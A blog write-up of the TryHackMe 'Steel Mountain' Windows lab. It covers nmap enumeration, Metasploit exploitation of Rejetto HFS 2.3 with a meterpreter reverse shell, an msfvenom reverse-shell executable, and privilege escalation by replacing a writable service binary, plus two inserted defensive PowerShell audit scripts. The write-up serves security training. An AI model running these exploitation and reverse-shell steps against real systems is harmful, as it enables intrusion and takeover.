
Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Steel Mountain

This is the first post about TryHackMe, a more guided and more relaxed hacking platform than HTB, in my opinion.

https://tryhackme.com

I am totally new to this hacking platform and I am doing the path Offensive Pentesting Advanced exploitation just for fun. I am not sure whether TryHackMe allows posting writeups, because I could not find any information about this, so if it is forbidden please contact me.

Note: Some sensitive information like IPs and the full flags is replaced with 😄, and the answers are not in the TryHackMe format. Just to sleep better.

So, on to the writeup.

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with a nmap scan:

sudo nmap -sS -sV -sC -O -p- --script vuln 10.10.😄
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:46 CEST
Nmap scan report for 10.10.😄
Host is up (0.040s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-method-tamper: 
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|              
|     Extra information:
|       
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /~login [GENERIC]
|   
|     References:
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|       http://www.mkit.com.ar/labs/htexploit/
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_      http://capec.mitre.org/data/definitions/274.html
|_http-server-header: HFS 2.3
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://seclists.org/fulldisclosure/2011/Aug/175
|       https://www.tenable.com/plugins/nessus/55976
|       https://www.securityfocus.com/bid/49303
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
49164/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=80%CT=1%CU=36036%PV=Y%DS=2%DC=I%G=Y%TM=60AE707
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5
OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 823.86 seconds

So there are several ports open: 80, 135, 139, 445, 3389, 5985, 8080, 47001 and a handful of high RPC ports. Let's start by browsing the site on the default port 80:

[screenshot: the site on port 80]

Looking at the page source code:

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Steel Mountain</title>
<style>
* {font-family: Arial;}
</style>
</head>
<body><center>
<a href="index.html"><img src="/img/logo.png" style="width:500px;height:300px;"/></a>
<h3>Employee of the month</h3>
<img src="/img/BillHarper.png" style="width:200px;height:200px;"/>
</center>
</body>
</html>

Using the browser to check what is on port 8080:

[screenshot: HttpFileServer on port 8080]

Here we get the exact version, HttpFileServer 2.3; clicking on the version link points to http://www.rejetto.com/hfs/

2 - Vulnerability Identification

So a quick search reveals that it is vulnerable to RCE:

searchsploit httpfileserver

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py

Shellcodes: No Results

There is also a Metasploit module.

Checking the exploit:

https://www.exploit-db.com/exploits/49125

The CVE is:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287

3 - Exploit

This time I am using Metasploit to take it easy and live longer. I will try to mix the use of Metasploit and manual exploitation depending on the energy I have on the day.

This is the module used with the configuration and payload set:

msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.😄         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     😄                yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Pressing the big button and starting the exploit:

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 😄:4444 
[*] Using URL: http://0.0.0.0:8080/TtG31N2LZQ
[*] Local IP: http://192.168.1.84:8080/TtG31N2LZQ
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /TtG31N2LZQ
[*] Sending stage (175174 bytes) to 10.10.😄
[!] Tried to delete %TEMP%\MUTmQHFQQU.vbs, unknown result
[*] Meterpreter session 3 opened (😄:4444 -> 10.10.😄:49254) at 2021-05-26 18:07:54 +0200
[*] Server stopped.

It worked, so let's loot the user flag.

C:\Users\bill\Desktop
user.txt

b047😄

4 - Post-Exploitation and privilege escalation

Now it is time to get root. I did not use the recommended tool, PowerUp; I used WinPEAS instead:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS


  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected
    File Permissions: bill [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteData/CreateFiles])
    Advanced SystemCare Service

So the service AdvancedSystemCareService9 is running with an unquoted path containing spaces, and the service binary itself is writable by our user, so my approach was simply to replace the file with a reverse shell executable.
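The WinPEAS finding above is the result of a check that any defender can run themselves. The following audit script is an added example written for this post; it is not the author's code and not part of WinPEAS. It lists every service whose binary path is unquoted and contains spaces, and every service whose binary or binary folder is writable by the current user or by broad groups (Everyone, Users, Authenticated Users, INTERACTIVE), and reports the Authenticode status of the binary. It assumes it is run on the host being reviewed with built-in cmdlets only; the set of "broad" principals is my own choice.

```powershell
# Audit script added to this writeup (not the author's code, not part of WinPEAS).
# Assumption: runs on the reviewed host with built-in cmdlets only.

$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$broadPrincipals = @(
    $me,
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights on the binary or its folder is enough to replace or plant a file.
$writeRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A quoted path ends at the closing quote; an unquoted one ends at the first
    # executable extension followed by whitespace or end of string.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.(exe|sys|dll|bat|cmd))(\s|$)') { return $Matches[1] }
    return $PathName.Trim()
}

function Test-UnquotedServicePath {
    param([string]$PathName)
    # Unquoted path with a space: the SCM tries each prefix before a space as the
    # executable, so "C:\Program Files\Foo Bar\svc.exe" also resolves "C:\Program.exe".
    if ($PathName.StartsWith('"')) { return $false }
    return (Get-ServiceBinaryPath $PathName) -match '\s'
}

function Get-BroadWriters {
    param([string]$Path)
    # Returns the broad principals (or the current user) holding write rights on $Path.
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    @($acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights) -band ([int]$writeRights)) -ne 0 -and
            $broadPrincipals -contains $_.IdentityReference.Value
        } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique)
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ([string]::IsNullOrWhiteSpace($svc.PathName)) { continue }
    $bin        = Get-ServiceBinaryPath $svc.PathName
    $binWriters = Get-BroadWriters $bin
    $dirWriters = Get-BroadWriters (Split-Path -Path $bin -Parent)   # DLL hijacking / planting
    $unquoted   = Test-UnquotedServicePath $svc.PathName
    if (-not ($binWriters -or $dirWriters -or $unquoted)) { continue }

    $sig = if (Test-Path -LiteralPath $bin) {
        (Get-AuthenticodeSignature -FilePath $bin).Status
    } else { 'Missing' }

    [pscustomobject]@{
        Service       = $svc.Name
        StartMode     = $svc.StartMode
        RunsAs        = $svc.StartName
        Binary        = $bin
        UnquotedPath  = $unquoted
        BinaryWriters = ($binWriters -join ', ')
        FolderWriters = ($dirWriters -join ', ')
        Signature     = $sig
    }
}

$findings | Sort-Object Service | Format-Table -AutoSize
```

On the Steel Mountain box this would list AdvancedSystemCareService9 with the current user in BinaryWriters and FolderWriters, running as LocalSystem. The fix for each finding is the same two steps: quote the ImagePath in the service configuration, and remove write rights for non-administrators from the binary and its folder (icacls with /remove), then confirm the binary's signature is the vendor's.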

msf6 exploit(windows/http/rejetto_hfs_exec) > msfvenom -p windows/shell_reverse_tcp LHOST=😄 LPORT=4433 -e x86/shikata_ga_nai -f exe -o ASCService.exe

After that a listener is needed, so I used the Metasploit module multi/handler to manage the meterpreter shell windows/meterpreter/reverse_tcp.

With the .exe generated, I uploaded it to the server with meterpreter and stopped the service.

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

I stopped it first because copying over the service binary, ASCService.exe, fails with an error while the service is still running.

Copying the .exe generated and replacing the service file:

C:\Program Files (x86)\IObit\Advanced SystemCare>copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
Yes
        1 file(s) copied.

Starting the service again to trigger the .exe with the reverse shell:

C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED with error 216.

Even though sc reports that error, when the service is started again the reverse shell is completed.
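The stop / copy / start sequence above leaves a clear trail in the System event log, which is what an incident responder would look at. The following triage script is an added example written for this post, not the author's code: for one service it pulls the Service Control Manager events (7036 state changes, 7000 start failures, 7045 new service installed) from the last few days and compares them with the binary on disk, flagging a binary modified after the service was last stopped, an invalid or missing signature, and start failures such as the error 216 seen above. It assumes it is run as a local administrator on the host, an English event log (the 'stopped' text match), and the service name from the writeup as the default.

```powershell
# Triage script added to this writeup (not the author's code).
# Assumptions: run as local administrator on the host; English SCM messages.
param(
    [string]$ServiceName = 'AdvancedSystemCareService9',   # service name from the writeup
    [int]$Days = 7
)

$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
if (-not $svc) { throw "Service '$ServiceName' not found" }

# Binary path without arguments, for both the quoted and the unquoted form.
$bin = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
       elseif ($svc.PathName -match '^(.+?\.exe)(\s|$)') { $Matches[1] }
       else { $svc.PathName.Trim() }

# 7036: service entered the running/stopped state; 7000: service failed to start
# (a start failure like the error 216 above is normally recorded this way);
# 7045: a new service was installed. Get-WinEvent returns newest events first.
$events = @(Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7000, 7036, 7045
        StartTime    = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like "*$($svc.DisplayName)*" })

$file          = Get-Item -LiteralPath $bin -ErrorAction SilentlyContinue
$lastStop      = $events | Where-Object { $_.Id -eq 7036 -and $_.Message -match 'stopped' } |
                 Select-Object -First 1
$startFailures = @($events | Where-Object Id -eq 7000)

$lastWrite = if ($file) { $file.LastWriteTime } else { $null }
$signature = if ($file) { (Get-AuthenticodeSignature -FilePath $bin).Status } else { 'Missing' }
$sha256    = if ($file) { (Get-FileHash -LiteralPath $bin -Algorithm SHA256).Hash } else { $null }
$stopTime  = if ($lastStop) { $lastStop.TimeCreated } else { $null }
# A service binary that changed on disk after the service was stopped is the pattern used above.
$swapped   = [bool]($file -and $lastStop -and $file.LastWriteTime -gt $lastStop.TimeCreated)

[pscustomobject]@{
    Service           = $svc.Name
    RunsAs            = $svc.StartName
    Binary            = $bin
    BinaryExists      = [bool]$file
    BinaryLastWrite   = $lastWrite
    Signature         = $signature
    Sha256            = $sha256
    LastStopEvent     = $stopTime
    StartFailures     = $startFailures.Count
    ModifiedAfterStop = $swapped
    RecentEvents      = $events.Count
} | Format-List
```

A ModifiedAfterStop of True together with a NotSigned or HashMismatch signature on a binary that runs as LocalSystem is the state this box is left in after the steps above; the SHA256 value can then be compared against a known-good copy of the vendor's binary.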

Finally getting the admin flag:

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

meterpreter > cd /users/administrator/desktop

meterpreter > cat root.txt
9af5😄

Thanks for reading!